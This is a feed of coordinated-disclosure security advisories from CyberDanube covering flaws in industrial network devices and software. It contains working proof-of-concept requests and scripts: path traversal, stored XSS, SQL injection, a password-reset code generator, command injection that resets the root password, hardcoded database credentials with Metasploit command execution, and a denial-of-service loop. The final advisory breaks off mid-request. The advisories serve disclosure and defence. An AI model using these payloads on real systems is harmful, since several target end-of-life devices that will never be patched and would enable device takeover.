Advisory – CyberDanube https://cyberdanube.com/de/ Vorbereitung ist der Schlüssel zum Erfolg Mon, 18 Nov 2024 13:03:28 +0000 de hourly 1 https://wordpress.org/?v=6.7 https://cyberdanube.com/wp-content/uploads/2022/02/favicon_32x32.png Advisory – CyberDanube https://cyberdanube.com/de/ 32 32 [EN] St. Pölten UAS | Path Traversal in Korenix JetPort https://cyberdanube.com/de/en-st-polten-uas-path-traversal-in-korenix-jetport/ Mon, 18 Nov 2024 13:03:11 +0000 https://cyberdanube.com/en/?p=4619

Title: Path Traversal
Product: Korenix JetPort 5601
Vulnerable version: 1.2
Fixed version: –
CVE: CVE-2024-11303
Impact: High
Homepage: https://korenix.com/
Found: 2024-05-24


The Korenix JetPort 5601 device is prone to a path traversal vulnerability. This allows an attacker to retrieve system files including password hashes and configuration.

Vendor description

„Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, system integrators, and brand label partners. […]“

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions

Korenix JetPort 5601v3 / v1.2

Vulnerability overview

1) Path Traversal (CVE-2024-11303)
A path traversal attack for unauthenticated users is possible. This allows getting access to the operating system of the device and access information like configuration files and connections to other hosts or potentially other sensitive information.

Proof of Concept

1) Path Traversal (CVE-2024-11303)

By sending the following request to the following endpoint, a path traversal vulnerability can be triggered:

GET /%2e%2e/%2e%2e/etc/passwd HTTP/1.1
Host: 10.69.10.2
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: de,en-US;q=0.7,en;q=0.3
Te: trailers
Connection: keep-alive

Note, that this is only possible when an interceptor proxy or a command line tool is used. A web browser would encode the characters and the path traversal would not work.
The response to the latter request is shown below:

HTTP/1.1 200 OK
Server: thttpd/2.19-MX Jun 2 2022
Content-type: text/plain; charset=iso-8859-1
[…]
Accept-Ranges: bytes
Connection: Keep-Alive
Content-length: 86

root::0:0:root:/root:/bin/false
admin:$1$$CoERg7ynjYLsj2j4glJ34.:502:502::/:/bin/true

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

None. Device is End-of-Life.

Workaround

Limit the access to the device and place it within a segmented network.

Recommendation

CyberDanube recommends Korenix customers to upgrade to another device.


Contact Timeline

  • 2024-09-23: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
  • 2024-09-24: Vendor stated, that the device is end-of-life. Contact will ask the engineering team if there are any changes.
  • 2024-10-15: Vendor stated, that the advisory can be published. No further updates are planned for this device.
  • 2024-11-18: Coordinated disclosure of advisory.

Author

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.

]]>
[EN] St. Pölten UAS | Stored Cross-Site Scripting in SEH utnserver Pro https://cyberdanube.com/de/en-st-polten-uas-stored-cross-site-scripting-in-seh-utnserver-pro/ Mon, 18 Nov 2024 13:01:41 +0000 https://cyberdanube.com/en/?p=4621

Title: Multiple Stored Cross-Site Scripting
Product: SEH utnserver Pro
Vulnerable version: 20.1.22
Fixed version: –
CVE: CVE-2024-11304
Impact: High
Homepage: https://www-seh-technology.com/
Found: 2024-05-24


The untserver Pro ist prone to stored cross-site scripting. This allows an attacker to place malicious code in the web interface of the untserver.

Vendor description

„We are SEH from Bielefeld – manufacturer of high-quality network solutions. With over 35 years of experience in the fields of printing and networks, we offer our customers a broad and high-level expertise in solutions for all types of business environments.“

Source: https://www.seh-technology.com/us/company/about-us.html

Vulnerable versions

utnserver Pro / 20.1.22
utnserver ProMAX / 20.1.22
INU-100 / 20.1.22

Vulnerability overview

1) Multiple Stored Cross-Site Scripting (CVE-2024-11304)
Different settings on the web interface of the device can be abused to store JavaScript code and execute it in the context of a user’s browser.

Proof of Concept

1) Multiple Stored Cross-Site Scripting (CVE-2024-11304)

The following snippet can be used to demonstrate, that stored cross-site scripting is possible in multiple locations on the device:

„><script>alert(document.location)</script>

Examples are:

  • Users password: „usrMg_pwd“
    This can be displayed in cleartext and executed in the device configuration.
  • Certificate options: „Common name“, „Organization name“, „Locality name“
    This can be executed in the certificate information.
  • Device description: „Host name“, „Contact person“, „Description“
    This can be executed in „Device -> Description“.
  • USB password via uploading a crafted „_parameters.txt“ file: „usbMdg_pwd“
    This can be executed in the „Maintenance -> Content View“ tab.

Saving this text to the device description leads to a persistent cross-site scripting. Therefore, everyone who openes the device description executes the injected code in the context of the own browser.

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

Install firmware version 20.1.35 to fix the vulnerabilities.

Workaround

None

Recommendation

CyberDanube recommends SEH Computertechnik customers to upgrade the firmware to the latest version available.


Contact Timeline

  • 2024-09-23: Contacting SEH Computertechnik and sent advisory to support. Support answered, that vulnerabilities are fixed in version 20.1.35.
  • 2024-10-21: Closed the issue and scheduled publication for November.
  • 2024-11-18: Coordinated disclosure of advisory.

Author

UAS St. Pölten, short for University of Applied Sciences St. Pölten, is a renowned institution of higher education located in St. Pölten, Austria. Known for its focus on practical education and innovative research, UAS St. Pölten offers a wide range of programs across various disciplines.

Recently, during a lecture of CyberDanube, conducted at UAS St. Pölten, students discovered cybersecurity vulnerabilities. This research was made possible by the support and coordination provided by CyberDanube & the MEDUSA solution.

]]>
[EN] Multiple Vulnerabilities in Riello Netman 204 https://cyberdanube.com/de/en-multiple-vulnerabilities-in-riello-netman-204/ Thu, 19 Sep 2024 10:47:51 +0000 https://cyberdanube.com/en/?p=4605

Title: Multiple Vulnerabilities
Product: Netman 204
Vulnerable version: 4.05
Fixed version: None
CVE: CVE-2024-8877, CVE-2024-8878
Impact: High
Homepage: https://www.riello-ups.com/
Found: 2024-05-17


The Netman 204 series is prone to unauthenticated SQL injection that allows modification of energy measurement entries. Furthermore, the UPS password reset function can be abused to reset the password without the riello support by calculating the recovery code for resetting the password.

Vendor description

„Riello Elettronica, lead by Cav. Lav. Pierantonio Riello, has a presence today in the Electrical manufacturing industry with two divisions: Energy, Automation and Security. It is a leader in the Uninterruptible Power Supply market with the well-known brand Riello UPS. Energy represents the Group’s core business, in particular with the manufacture of UPS that are firstly able to guarantee the quality of electricity and secondly maintain normal operation and continuity in case of blackouts or anomalies in the energy supply. Riello UPS designs and produces strategical solutions for every kind of requirement and make a bespoke offering according to the clients’ needs: from banks to the hospitals, transport to infrastructures, from domestic use to data centres.“

Source: https://www.riello-ups.com/pages/41-the-riello-elettronica-group

Vulnerable versions

NetMan 204 / 4.05

Vulnerability overview

1) SQL Injection (CVE-2024-8877)
The three endpoints /cgi-bin/db_datalog_w.cgi, /cgi-bin/db_eventlog_w.cgi, and /cgi-bin/db_multimetr_w.cgi are vulnerable to SQL injection without prior authentication. This enables an attacker to modify the collected log data in an arbitrary way.

2) Unauthenticated Password Reset (CVE-2024-8878)
By navigating to the endpoint /recoverpassword.html an attacker can gather the netmanid from the UPS. This id can be used to calculate the recovery code for resetting the password. This way enables an attacker to take over control of the UPS and e.g. turn it off.

Proof of Concept

1) SQL Injection (CVE-2024-8877)

The system is subsceptible to SQL injections, which is illustrated by the following payloads:

AND 1=0:
/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%270

AND 1=1:
/cgi-bin/db_eventlog_w.cgi?date_start=1715609000&date_end=1715630160&gravity=%25&type=%25%27and/**/%271%27=%271

The first request does not return any data, while the second request returns all entries with a start and end date in the given interval.

2) Unauthenticated Password Reset (CVE-2024-8878)

The following python script can be used to generate the recovery code from the netmanid:

import hashlib
import sys
def calc_code(netman_id):
secret = b“NMP“
netman_id = secret + netman_id[3:]
round1 = hashlib.md5(netman_id).hexdigest().encode(‚utf-8‘)
round2 = hashlib.sha1(round1).hexdigest()
code = round2[5:5+7]
return code
if len(sys.argv) < 2:
sys.exit(„usage: {} netman_id“.format(sys.argv[0]))
netman_id = sys.argv[1]
print(calc_code(netman_id.encode(‚utf-8‘))

Inputting the recovery code in „/recoverpassword.html“ resets the login credentials to admin:admin.

Solution

None.

Workaround

Limit access to the device.

Recommendation

Riello should release a firmware update that fixes the mentioned vulnerabilities.
Customers should not use this device in productive networks.


Contact Timeline

  • 2024-05-21: Contacting Riello UPS Group via riello@riello-ups.com.
  • 2024-06-06: Contacting Riello UPS Group via security-incident@riello-ups.com.
  • 2024-06-10: Received confirmation that the issue is being looked into.
  • 2024-07-22: Asking Riello UPS Group for a status of the update.
  • 2024-07-22: Contact stated that there is no planned date for the update.
  • 2024-08-05: Asking Riello UPS Group for a status of the update and telling them that the advisory will be published on 2024-09-19 after a 90-day period as stated in our Responsible Disclosure Agreement.
  • 2024-08-07: Contact stated that there are no news regarding the update and that it would take longer than 2024-09-19.
  • 2024-08-13: Asking Riello UPS Group about news on the update and a possible release date.
  • 2024-08-26: Contact stated that there are is no information regarding the update.
  • 2024-09-19: Advisory published.

Author

David Blagojevic is a Security Researcher at CyberDanube. He is currently engaged in research activities within the fields of firmware emulation and firmware analysis, where he is contributing to the development and advancement of the MEDUSA Firmware Emulation Framework.

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points.

]]>
[EN] Multiple Vulnerabilities in Korenix JetPort https://cyberdanube.com/de/en-multiple-vulnerabilities-in-korenix-jetport/ Sun, 04 Aug 2024 14:00:09 +0000 https://cyberdanube.com/en/?p=4597

Title: Multiple Vulnerabilities
Product: Korenix JetPort
Vulnerable version: <=1.2
Fixed version: None
CVE: CVE-2024-7395, CVE-2024-7396, CVE-2024-7397
Impact: High
Homepage: https://korenix.com/
Found: 2024-04-01


The JetPort series is prone to unauthenicated command injection, which allows an attacker to fully compromise the device from the network.

Vendor description

„Korenix Technology, a Beijer group company within the Industrial Communication business area, is a global leading manufacturer providing innovative, market-oriented, value-focused Industrial Wired and Wireless Networking Solutions. With decades of experiences in the industry, we have developed various product lines […].

Our products are mainly applied in SMART industries: Surveillance, Machine-to-Machine, Automation, Remote Monitoring, and Transportation. Worldwide customer base covers different Sales channels, including end-customers, OEMs, systemintegrators, and brand label partners. […]“

Source: https://www.korenix.com/en/about/index.aspx?kind=3

Vulnerable versions

JetPort 5601v3 / v1.2

Vulnerability overview

1) Insufficient Authentication (CVE-2024-7395)
The configuration service on port 600/tcp doesnt require authentication to be used. This allows an attacker to change the password or other critical information.

2) Plaintext Communication (CVE-2024-7396)
The communication of the configuration service is transmitted in plain text. An attacker could use this information to sniff passwords or other critical information.

3) Unauthenticated Command Injection (CVE-2024-7397)
An attacker with network access an can execute arbitrary commands as root user via the management service on port 600/tcp.

Proof of Concept

1) Insufficient Authentication (CVE-2024-7395)

The management software JetPort Commander is used as an frontend for the telnet service on 600/tcp. While it is possible to set a password, the passwords gets sent to the software in cleartext and gets validated on the client software rather than on the device. An attacker can bypass the management software by using telnet to directly connect to the port. This allows him to reconfigure the device including passwords and access controls.

$ telnet 192.168.122.76 600
Trying 192.168.122.76…
Connected to 192.168.122.76.
Escape character is ‚^]‘.
-> setpassword poc

target:/$ cat /tmp/com2ip.conf
version:1.2.0
model:JetPort5601v3
name:JetPort5601v3-DEFAULT
serialno:0000000000000000
password:poc
switchmode:redundant
network:static:192.168.122.76:192.168.10.1:192.168.10.1

2) Plaintext Communication (CVE-2024-7396)

The management service uses telnet as protocol. We used tcpdump to inspect the traffic during a password change. The new password (newpass) is readable during transmission.

# sudo tcpdump -i virbr0 dst port 600 -X
14:17:25.461197 IP 192.168.122.240.49600 > 192.168.122.76.600: Flags [P.], seq 0:21, ack 13, win 16422, length 21
0x0000: 4500 003d 16a7 4000 8006 6d86 c0a8 7af0 E..=..@…m…z.
0x0010: c0a8 7a4c c1c0 0258 522b 6096 12eb 337d ..zL…XR+`…3}
0x0020: 5018 4026 76bd 0000 7365 7470 6173 7377 P.@&v…setpassw
0x0030: 6f72 6420 6e65 7770 6173 730d 0a ord.newpass..

3) Unauthenticated Remote Code Execution (CVE-2024-7397)

The management service on port 600/tcp is used to configure JetPort devices over the network. An attacker can inject arbitrary commands in multiple settings options. The binary ser2net receives the data via the telnet protocol and translates it to arguments for system() calls. For our PoC we used the setsntp option to create the file /tmp/pwned.

$ telnet 192.168.122.76 600
Trying 192.168.122.76…
Connected to 192.168.122.76.
Escape character is ‚^]‘.
-> setsntp pool.ntp.org$(touch /tmp/pwned),123,Asia/Taipei,1
OK
->

target:/$ ls -rtlha /tmp/
drwxrwxr-x 17 root 0 1.0k Apr 4 10:41 ..
-rw-r–r– 1 root 0 4 Apr 4 12:28 thttpd.pid
-rw-r–r– 1 root 0 712 Apr 4 12:29 com2ip.conf
-rw-r–r– 1 root 0 0 Apr 4 12:33 pwned

The vulnerabilities were manually verified on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com).

Solution

None. Device is End-of-Life.

Workaround

Limit the access to the device and place it within a segmented network.

Recommendation

CyberDanube recommends customers from Korenix to remove the device from their network topology.


Contact Timeline

  • 2024-04-08: Contacting Beijer Electronics Group via cs@beijerelectronics.com.
  • 2024-05-07: Received confirmation that the issue is beeing looked into.
  • 2024-06-10: Contact stated that the product is considered EoL and will no longer receive security updates.
  • 2024-06-10: Confirm receipt and telling them that we will publish the advisory after our 90-days deadline.
  • 2024-08-05: Publication of the Advisory.

Author

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points.

]]>
[EN] Multiple Vulnerabilities in Perten ProcessPlus https://cyberdanube.com/de/en-multiple-vulnerabilities-in-perten-processplus/ Sun, 21 Jul 2024 12:08:32 +0000 https://cyberdanube.com/en/?p=4587

Title: Multiple Vulnerabilities
Product: Perten ProcessPlus
Vulnerable version: <=1.11.6507.0
Fixed version: 2.0.0
CVE: CVE-2024-6911, CVE-2024-6912, CVE-2024-6913
Impact: High
Homepage: https://perkinelmer.com/
Found: 2024-04-24


The ProcessPlus measurement software is prone to local file inclusion, uses default MSSQL credentials, and is executed with unnecessarily high privileges.

Vendor description

„For 85 years, PerkinElmer has pushed the boundaries of science from food to health to the environment. We’ve always pursued science with a clear purpose – to help our customers achieve theirs. Our expert team brings technology and intangibles, like creativity, empathy, diligence, and a spirit of collaboration, in equal measure, to fulfill our customers’ desire to work better, innovate better, and create better.

PerkinElmer is a leading, global provider of technology and service solutions that help customers measure, quantify, detect, and report in ways that help ensure the quality, safety, and satisfaction of their products.“

Source: https://www.perkinelmer.com/

Vulnerable versions

ProcessPlus Software / <=1.11.6507.0

Vulnerability overview

1) Unauthenticated Local File Inclusion (CVE-2024-6911)
A LFI was identified in the web interface of the device. An attacker can use this vulnerability to read system-wide files and configuration.

2) Hardcoded MSSQL Credentials (CVE-2024-6912)
The software is using the same MSSQL credentials across multiple installations. In combination with 3), this allows an attacker to fully compromise the host.

3) Execution with Unnecessary Privileges (CVE-2024-6913)
The software uses the user „sa“ to connect to the database. Access to this account allows an attacker to execute commands via the „xp_cmdshell“ procedure.

Proof of Concept

1) Unauthenticated Local File Inclusion (CVE-2024-6911)

The LFI can be triggered by using the following GET Request:

GET /ProcessPlus/Log/Download/?filename=..\..\..\..\..\..\Windows\System32\drivers\etc\hosts&filenameWithSerialNumber=_Errors_2102162.log HTTP/1.1
Host: 192.168.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: close
Upgrade-Insecure-Requests: 1

This example returns the content from „C:\Windows\System32\drivers\etc\hosts“ of an affected installation.

2) Hardcoded MSSQL Credentials (CVE-2024-6912)

Analysis across multiple installations show that the configuration file „\ProgramData\Perten\ProcessPlus\OPCDA_SERVER.xml“ contains credentials:

[…]
<OPCDA_Server dbconnectstring=“Driver={SQL Server};SERVER=.\PertenSQL;
DATABASE=ProcessPlus_OPC;UID=sa;PWD=enilno“ application_id=“1″
appid=“Perten.OPCDA.Server“ loglevel=“info“
logfile=“C:\Perten\ProcessPlus\Log\opcserver.log“>
[…]

These credentials „sa:enilno“ were re-used in all reviewed installations.

3) Execution with Unnecessary Privileges (CVE-2024-6913)

The application uses the „sa“ user to authenticate with the database. By using Metasploit an attacker can execute arbitrary commands:

msf6 auxiliary(admin/mssql/mssql_exec) > show options

Module options (auxiliary/admin/mssql/mssql_exec):

Name Current Setting
—- —————
CMD dir
PASSWORD enilno
RHOSTS 192.168.0.1
RPORT 1433
TDSENCRYPTION false
TECHNIQUE xp_cmdshell
USERNAME sa
USE_WINDOWS_AUTHENT false

msf6 auxiliary(admin/mssql/mssql_exec) > run
[*] Running module against 192.168.0.1

[*] 192.168.0.1:1433 – SQL Query: EXEC master..xp_cmdshell ‚dir‘

[…]
Directory of C:\Windows\system32
01/23/2024 13:37 AM <DIR> .
01/23/2024 13:37 AM <DIR> ..
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM <DIR> 0123
01/23/2024 13:37 AM 232 @AppHelpToast.png
01/23/2024 13:37 AM 308 @AudioToastIcon.png
[…]

Solution

Update to version 2.0.0.

Workaround

Restrict network access to the host with the installed software. Change the default credentials of the database in the config file and the database itself.

Recommendation

CyberDanube recommends Perten customers to upgrade the software to the latest version available and to restrict network access to the management interface.


Contact Timeline

  • 2024-04-29: Contacting PerkinElmer via dpo@perkinelmer.com.
  • 2024-05-13: Vendor asked for unencrypted advisory.
  • 2024-05-16: Sent advisory to vendor.
  • 2024-05-22: Asked for status update. No answer.
  • 2024-05-28: Asked for status update. Contact stated that they are working on a fix.
  • 2024-06-10: Asked for status update. Contact stated that all issues should be fixed by end of month. Local file inclusion should be fixed in version 1.16. Asked for a release date of version 1.16. No answer.
  • 2024-07-13: Asked for status update.
  • 2024-07-15: Contact stated, that all three issues have been fixed in version 2.0.0 which have been released on 2024-07-11.
  • 2024-07-16: Asked for a link to the firmware update release.
  • 2024-07-17: Set release date to 2024-07-22.
  • 2024-07-22: Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool > MEDUSA < has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on digital twins, information security risk assessment and firmware analysis. Currently, he is working on developing the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points.

]]>
Authenticated Command Injection in Helmholz REX100 Router https://cyberdanube.com/de/authenticated-command-injection-in-helmholz-rex100-router/ Wed, 03 Jul 2024 07:38:24 +0000 https://cyberdanube.com/en/?p=4579

Title: Authenticated Command Injection
Product: Helmholz Industrial Router REX100, MBConnectline mbNET.mini
Vulnerable version: <= 2.2.11
Fixed version: 2.2.13
CVE: CVE-2024-5672
Impact: High
Homepage: https://www.helmholz.de/, https://mbconnectline.com/
Found: 2024-05-08


The Helmholz REX100 Router ist prone to an authenticated command injection attack. This allows an attacker to gain root access on the router, which usually acts as key infrastructure device in OT.

Vendor description

Helmholz is your specialist when it comes to sophisticated products for your automation projects. With current, clever system solutions from Helmholz, the high demands placed on industrial networks in times of increasing automation can be met both reliably and efficiently – including a high level of operating convenience. The broad product spectrum ranges from a decentralized I/O system to switches and repeaters, gateways, a NAT gateway/firewall and secure IoT remote machine access.

Source: https://www.helmholz.de/en/company/about-helmholz/

Vulnerable versions

Helmholz Industrial Router REX100 <= 2.2.11
MBConnectline mbNET.mini <= 2.2.11

Vulnerability overview

1) Authenticated Command Injection (CVE-2024-5672)

A command injection was identified on the webserver. This vulnerability can only be exploited if a user is authenticated on the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device.

Proof of Concept

1) Authenticated Command Injection (CVE-2024-5672)

The following GET request changes the password for the root user and returns the process list of the device.

GET /cgi-bin/ping;echo$IFS’root:password’|chpasswd;ps;.sh HTTP/1.1
Host: 192.168.25.11
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Authorization: Basic aGVsbWhvbHo6cm91dGVy
Connection: close
Upgrade-Insecure-Requests: 1

HTTP/1.0 200 OK
This is haserl version 0.8.0
This program runs as a cgi interpeter, not interactively.
Bug reports to: Nathan Angelacos <nangel@users.sourceforge.net>

Password for ‚root‘ changed
PID USER VSZ STAT COMMAND
1 root 2292 S init
2 root 0 SW [kthreadd]
3 root 0 SW [ksoftirqd/0]
4 root 0 SW [events/0]
5 root 0 SW [khelper]
8 root 0 SW [async/mgr]
[…]

Solution

Update to latest version: 2.2.13

Workaround

None

Recommendation

CyberDanube recommends Helmholz customers to upgrade the firmware to the latest version available and to restrict network access to the management interface of the device.


Contact Timeline

  • 2024-05-15: Contacting Helmholz via psirt@helmholz.de.
  • 2024-05-15: Receiving security contact for MBConnectline.
  • 2024-05-21: Contact stated they are working on a fix.
  • 2024-06-13: Received advisory from contact and assigned CVE number.
  • 2024-07-01: Contact sends out final release date.
  • 2024-07-03: Coordinated release of advisory with CERT@VDE.

Author

Sebastian Dietz is a Security Researcher at CyberDanube. His research focuses on embedded systems,  firmware analysis with digital twins and information security risk assessment. Currently, he is working on further development of the firmware emulation Framework MEDUSA. Sebastian has already proven his technical expertise at various CTFs such as the „Austrian Cyber Security Challenge“, where he has won in his category with an impressive number of points. Most recently, Sebastian was involved in uncovering zero-day vulnerabilities and publishing of security advisories.

]]>
[EN] Multiple Vulnerabilities in SEH untserver Pro https://cyberdanube.com/de/en-multiple-vulnerabilities-in-seh-untserver-pro/ Mon, 03 Jun 2024 08:21:43 +0000 https://cyberdanube.com/en/?p=4568

Title: Multiple Vulnerabilities
Product: SEH utnserver Pro
Vulnerable version: 20.1.22
Fixed version: 20.1.28
CVE: CVE-2024-5420, CVE-2024-5421, CVE-2024-5422
Impact: High
Homepage: https://www.seh-technology.com/
Found: 2024-03-04


The untserver Pro ist prone to stored cross-site scripting, file disclosure and denial of service attacks. This allows an attacker to deactivate the device or place malicious code in the web interface of the untserver.

Vendor description

We are SEH from Bielefeld – manufacturer of high-quality network solutions. With over 35 years of experience in the fields of printing and networks, we offer our customers a broad and high-level expertise in solutions for all types of business environments.

Source: https://www.seh-technology.com/us/company/about-us.html

Vulnerable versions

utnserver Pro / 20.1.22
utnserver ProMAX / 20.1.22
INU-100 / 20.1.22

Vulnerability overview

1) Stored Cross-Site Scripting (CVE-2024-5420)

A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. Multiple parameters, e.g. the device description, can be abused to inject JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user.

2) Authenticated File Disclosure (CVE-2024-5421)
Files and content of directories can be disclosed by integrated functions of the device.

3) Denial of Service (CVE-2024-5422)
A Denial-of-Service vulnerability has been identified in the web interface of the device. This can be triggered by sending a lot of requests that trigger serial interface access on the device.

Proof of Concept

1) Stored Cross-Site Scripting (CVE-2024-5420)

By accessing to the following URL, an attacker can modify the device description:
http://$IP/device/description_en.html

By using malicious JavaScript payload, it is possible to execute arbitrary code. This snippet demonstrates such a payload:

„><script>alert(document.location)</script>

Saving this text to the device description leads to a persistent cross-site scripting. Therefore, everyone who openes the device description executes the injected code in the context of the own browser.

2) Authenticated File Disclosure (CVE-2024-5421)

A hidden function in the web-interface of the device can be used to disclose directories and files on operating system level. The function can be accessed directly via the browser:

http://$IP/info/dir?/

This lists the current directory and provides the files to be downloaded.

3) Denial of Service (CVE-2024-5422)

For triggering a denial of service on the device, multiple file descriptors are opened by using the following script:

#!/bin/bash
echo „Parameters: $1 $2“
last_iter=$(($2 – 1))
for ((i=1; i<=$2; i++))
do
echo „[$i] Downloading application binary“
if [[ „$i“ == „$last_iter“ ]];then
curl http://$1/info/file?/application –output ./file_${i}.txt &> /dev/null
else
curl http://$1/info/file?/application –output ./file_${i}.txt &> /dev/null &
fi
done

The vulnerabilities were manually tested on an emulated device by using the MEDUSA scalable firmware runtime (https://medusa.cyberdanube.com) and verified on a real device.

Solution

Install firmware version 20.1.28 to fix the vulnerabilities.

Workaround

None

Recommendation

CyberDanube recommends SEH Computertechnik customers to upgrade the firmware to the latest version available.


Contact Timeline

  • 2024-03-11: Contacting SEH Computertechnik. Received reply from support. Sent advisory to support.
  • 2024-03-20: Asked for an update. Contact stated, that an internal timeline will be defined.
  • 2024-04-10: Asked for an update. Contact stated, that the vulnerabilities will be patched soon.
  • 2024-04-16: Contact sent link to patched firmware release candidate.
  • 2024-05-31: Notified SEH Computertechnik that advisory will be released first week of June. Received confirmation from SEH Computertechnik.
  • 2024-06-04: Coordinated release of security advisory.

Author

Thomas Weber is co-founder and security researcher at CyberDanube in the field of embedded systems, (I)IoT and OT. He has uncovered numerous zero-day vulnerabilities and has published a large number of security advisories in the past. As part of his scientific work, he developed an emulation system for firmware – today the SaaS tool MEDUSA has emerged out of this. In the past he spoke at cyber security conferences such as HITB, BlackHat, IT-SECX, HEK.SI and OHM(international). Nowadays, he brings his competence and experience into security products.

]]>
[EN] Multiple Vulnerabilities in ORing IAP420 https://cyberdanube.com/de/en-multiple-vulnerabilities-in-oring-iap420/ Mon, 27 May 2024 11:41:51 +0000 https://cyberdanube.com/en/?p=4560

Title: Multiple Vulnerabilities
Product: ORing IAP-420
Vulnerable version: 2.01e
Fixed version: –
CVE: CVE-2024-5410, CVE-2024-5411
Impact: High
Homepage: https://oringnet.com/
Found: 2024-01-19


The ORing IAP420 is prone to authenticated command injection and stored cross-site scripting. Therefore, an attacker can fully compromize the device via the management interface.

Vendor description

Founded in 2005, ORing specializes in developing innovative own-branded products for industrial settings. Over the years, ORing has accumulated abundant experience in wired and wireless network communications industry. In line with the commercialization of 5G, ORing has stretched its arm into the IIoT field, helping customers realize all kinds of IIoT applications such as smart manufacturing, smart city, and industrial automation. With high product quality and best customer services in mind, ORing has continued to launch cutting-edge products catering to customer needs. ORing’s products have been widely adopted in surveillance, rail transport, industrial automation, power substations, renewable energy, and marine industries with offices worldwide to address customer needs in real time.

Source: https://oringnet.com/en/about-us/company-profile

Vulnerable versions

Tested on ORing IAP420 / 2.01e

Vulnerability overview

1) Stored Cross-Site Scripting (CVE-2024-5410)

A Stored Cross-Site Scripting vulnerability was identified in the web interface of the device. The SSID of the WiFi can be configured to contain arbitrary JavaScript code. An attacker can exploit this vulnerability by luring a victim to visit a malicious website. Furthermore, it is possible to hijack the session of the attacked user.

2) Authenticated Command Injection (CVE-2024-5411)
The filename parameter of the config file upload is prone to a Command Injection vulnerability. This vulnerability can only be exploited if a user is authenticated to the web interface. This way, an attacker can invoke commands and is able to get full control over the whole device.

Proof of Concept

1) Stored Cross-Site Scripting (CVE-2024-5410)

Stored Cross-Site Scripting can be triggered by placing JavaScript code into the SSID input field of the web interface as authenticated user. A single request for injecting the script is shown below:

POST /cgi-bin/wl_set.cgi HTTP/1.1
Host: 192.168.0.1
Accept-Language: de,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 659
Connection: keep-alive
Cookie: auth=YWRtaW46YWRtaW4=
Upgrade-Insecure-Requests: 1

sel_op_mode=client&sel_mssid=0&tf_ssid=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&sel_isolation=0&
sel_mssid_isolation=0&sel_auth_mode=0&rb_wep_authmode=0&sel_wep_enc_bits=0&
sel_wep_key_type=0&tf_key1=&tf_key2=&tf_key3=&tf_key4=&rb_wpapsk_authmode=0&
rb_wpapsk_enc=0&tf_wpa_key=&rb_wpa_authmode=0&rb_wpa_enc=0&tf_ip1=&tf_ip2=&
tf_ip3=&tf_ip4=&tf_radius_port=&tf_radius_key=&tf_ip1_1x=&tf_ip2_1x=&
tf_ip3_1x=&tf_ip4_1x=&tf_radius_port_1x=&tf_radius_key_1x=&bt_save=Save&
lang=en&channel=0&isolation=0&mssid_isolation=0&auth_mode=0&wep_authmode=0&
wpapsk_authmode=0&wpa_authmode=0&wpa_enc_type=0&wep_enc_bits=0&wep_key_type=0&
wep_key_index=0&ret_msg=

2) Authenticated Command Injection (CVE-2024-5411)

A command can be injected in the filename of the uploaded config. By sending a request as shown below, the content of the current directory can be shown:

POST /cgi-bin/admin_config.cgi?todo=upconf HTTP/1.1
Host: 10.69.10.2
User-Agent: Mozilla/5.0
